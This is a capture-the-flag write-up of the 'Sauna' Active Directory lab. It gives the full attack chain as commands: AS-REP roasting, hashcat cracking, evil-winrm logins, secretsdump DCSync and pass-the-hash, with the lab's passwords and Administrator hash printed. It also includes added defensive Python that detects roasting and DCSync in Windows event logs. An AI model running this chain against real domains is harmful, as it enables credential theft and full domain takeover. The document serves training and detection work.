Sauna
Overview
Sauna is an easy Windows Active Directory box. The target runs a bank
website that lists employee names. Converting those names into likely AD username
formats reveals one account — fsmith — with Kerberos pre-authentication
disabled, making it AS-REP roastable. Cracking the roasted hash gives a working
WinRM login. Once inside, WinPEAS finds autologon credentials for a second
account (svc_loanmgr) that BloodHound shows has DCSync rights over the
domain. Dumping the Administrator NTLM hash via DCSync allows a pass-the-hash
WinRM session as domain admin.
Path: employee name enumeration → AS-REP roasting (fsmith) →
WinPEAS autologon creds → svc_loanmgr DCSync → Administrator hash → root.
Enumeration
A full port scan reveals the standard Windows domain controller fingerprint:
DNS, Kerberos, LDAP, SMB, WinRM, and IIS on port 80 — with the domain
EGOTISTICAL-BANK.LOCAL.
$ nmap -p- -A 10.129.95.180
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows AD LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: SAUNA; OS: Windows

After adding EGOTISTICAL-BANK.LOCAL to /etc/hosts, the website shows a public team
page listing six employees:

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
Foothold — AS-REP Roasting
I generated a username wordlist from the six names in common AD formats
(first.last, flast, firstl) and ran GetNPUsers.py against the domain to
check for accounts with pre-authentication disabled:
$ GetNPUsers.py -usersfile usersMaybe EGOTISTICAL-BANK.LOCAL/ -format hashcat -outputfile hashes.txt

fsmith has pre-auth disabled. Cracking the resulting hash against rockyou.txt:
$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

Credentials: fsmith : Thestrokes23
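The defender's side of the foothold above, as an added example that is not part of the original writeup: an audit of LDAP userAccountControl values for the DONT_REQ_PREAUTH bit that made fsmith AS-REP roastable, and detection of the activity in Windows Security event 4768 (TGT requested), both the burst of unknown-principal failures that a generated name list produces and the no-pre-auth RC4 request that is the roast itself. Field names follow the event's XML data; every account other than fsmith and svc_loanmgr, every IP address, and every event record is constructed for the example.

```python
from collections import Counter

# Added example, not part of the original writeup. All sample data is constructed.

DONT_REQ_PREAUTH = 0x400000  # UF_DONT_REQUIRE_PREAUTH bit in userAccountControl

# Constructed LDAP results as (sAMAccountName, userAccountControl). Only fsmith
# carries the pre-auth bit, as on the box; hbear and the others are invented.
SAMPLE_UAC = [
    ("fsmith", 0x400200),       # NORMAL_ACCOUNT | DONT_REQ_PREAUTH
    ("hbear", 0x200),           # NORMAL_ACCOUNT
    ("svc_loanmgr", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("administrator", 0x200),
]


def roastable_accounts(entries):
    """Return the sAMAccountNames whose userAccountControl has pre-auth disabled."""
    return sorted(name for name, uac in entries if uac & DONT_REQ_PREAUTH)


def _event(name, ip, status, preauth, etype):
    # Helper: a 4768 record using the event's XML data field names.
    return {"EventID": 4768, "TargetUserName": name, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed 4768 records: unknown-principal failures (Status 0x6) from one
# source as a name list is tried, the successful no-pre-auth RC4 request that
# is the roast, and one ordinary logon for contrast.
SAMPLE_4768 = [
    _event(n, "10.10.14.5", "0x6", "-", "0xffffffff")
    for n in ("fergus.smith", "hugo.bear", "steven.kerb", "sbear", "scoins", "btaylor")
] + [
    _event("fsmith", "10.10.14.5", "0x0", "0", "0x17"),         # no pre-auth, RC4: roast
    _event("svc_loanmgr", "10.129.95.50", "0x0", "2", "0x12"),  # timestamp pre-auth, AES256
]


def asrep_roast_hits(events):
    """(user, source IP, ticket etype) for successful TGT requests with no pre-auth.

    PreAuthType 0 with an RC4 (0x17) ticket is the classic roasting signature:
    the client asks for RC4 because it is the cheapest hash to crack offline.
    Any PreAuthType 0 success deserves a look, so the etype is reported rather
    than used as a filter.
    """
    return [(ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"])
            for ev in events
            if ev.get("EventID") == 4768
            and ev["Status"] == "0x0" and ev["PreAuthType"] == "0"]


def username_probe_sources(events, threshold=5):
    """Source IPs with at least `threshold` 4768 failures for unknown principals.

    Result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) is returned once per
    non-existent name, so a generated wordlist shows up as a burst of them
    from a single client.
    """
    unknown = Counter(ev["IpAddress"] for ev in events
                      if ev.get("EventID") == 4768 and ev["Status"] == "0x6")
    return sorted(ip for ip, n in unknown.items() if n >= threshold)


if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_UAC))
    print("roast hits:", asrep_roast_hits(SAMPLE_4768))
    print("probe sources:", username_probe_sources(SAMPLE_4768))
```

The same audit can be run directly against AD with the LDAP filter `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` (4194304 is 0x400000), and the fix is clearing the bit, for example with `Set-ADAccountControl -DoesNotRequirePreAuth $false`. Note that the RC4 check only catches attackers who ask for RC4; an AS-REP with an AES ticket is still crackable, just far more slowly, which is why PreAuthType 0 on its own is the condition that matters.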
User
With WinRM open, logging in is straightforward:
$ evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL
whoami /all shows fsmith has no interesting privileges beyond the default
Remote Management Users membership — no direct path to escalation from here.
Privilege Escalation — Autologon Credentials and DCSync
Running WinPEAS surfaces AutoLogon registry credentials:

svc_loanmanager : Moneymakestheworldgoround!
Note: the registry value spells the account svc_loanmanager, but the AD account
name is the truncated form svc_loanmgr. A BloodHound collection using fsmith's
credentials maps the domain graph:
$ python3 /tools/bloodhoundCE-py/bloodhound.py \
-u fsmith -p "Thestrokes23" \
-d EGOTISTICAL-BANK.LOCAL -c All --zip \
-ns 10.129.95.180

BloodHound shows svc_loanmgr has DCSync rights (DS-Replication-Get-Changes-All):

DCSync lets us impersonate a domain controller and pull NTLM hashes for any account directly from NTDS.DIT:
$ secretsdump.py svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180 \
-just-dc-user Administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
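What the DCSync above looks like to the domain controller, as an added example that is not part of the original writeup: replication is authorised by three control access rights on the domain object, and a Windows Security event 4662 that exercises them from anything other than a DC computer account (or a known sync account) is the DCSync signature. This requires the "Audit Directory Service Access" subcategory and a SACL on the domain object that audits Control Access. Field names follow the event's XML data; the DC account SAUNA$ comes from the scan, while DC02$ and every event record are constructed for the example.

```python
import re

# Added example, not part of the original writeup. Sample events are constructed.

# Control access rights (rightsGuid values) that permit directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)
DOMAIN_DNS_CLASS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS object class

# Principals expected to replicate: the box's DC computer account plus a second
# DC invented for the example. A real list would also carry directory sync
# service accounts (for instance Azure AD Connect's MSOL_* account).
KNOWN_REPLICATORS = frozenset({"SAUNA$", "DC02$"})


def _event(subject, properties, access_mask="0x100"):
    # Helper: a 4662 record in the shape of the event's XML data fields. The
    # Properties value is a multi-line string: the access type, then the GUIDs
    # of the rights exercised and of the object class.
    return {"EventID": 4662, "ObjectServer": "DS", "SubjectUserName": subject,
            "SubjectDomainName": "EGOTISTICAL-BANK", "AccessMask": access_mask,
            "Properties": properties}


REPL_PROPS = ("Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
              "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS_CLASS)

SAMPLE_4662 = [
    # the secretsdump.py run above as the DC records it: a user account, both rights
    _event("svc_loanmgr", REPL_PROPS),
    # ordinary inter-DC replication: identical rights, but a DC computer account
    _event("DC02$", REPL_PROPS),
    # unrelated 4662 by the same user: a property read, no replication rights
    _event("svc_loanmgr", "Read Property\n\t" + DOMAIN_DNS_CLASS, access_mask="0x10"),
]


def dcsync_alerts(events, known_replicators=KNOWN_REPLICATORS):
    """Return (subject, rights) for 4662 events that exercise replication rights
    from a principal not in `known_replicators`."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("ObjectServer") != "DS":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = tuple(sorted(REPLICATION_RIGHTS[g] for g in guids
                              if g in REPLICATION_RIGHTS))
        if rights and ev["SubjectUserName"].upper() not in known_replicators:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_4662):
        print(f"DCSync-like replication by {subject}: {', '.join(rights)}")
```

The allowlist is the weak point of this rule: anything added to it can replicate unchallenged, so it should hold only DC computer accounts and audited sync accounts. The preventive control is the one BloodHound made visible above: list the principals holding these rights on the domain object and remove them from any that are not domain controllers.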
Root
With the Administrator NTLM hash in hand, a pass-the-hash WinRM session gives domain admin access:
$ evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i EGOTISTICAL-BANK.LOCAL

Takeaways
- AS-REP roasting requires only a username list — no prior credentials needed. Accounts with pre-auth disabled are offline crackable and should not exist in production; the fix is enforcing Kerberos pre-authentication for all accounts.
- AutoLogon credentials in the registry are a common lateral-movement path. WinPEAS reliably surfaces them; once an account with DCSync rights is compromised, the entire domain is effectively owned without touching a Domain Controller interactively.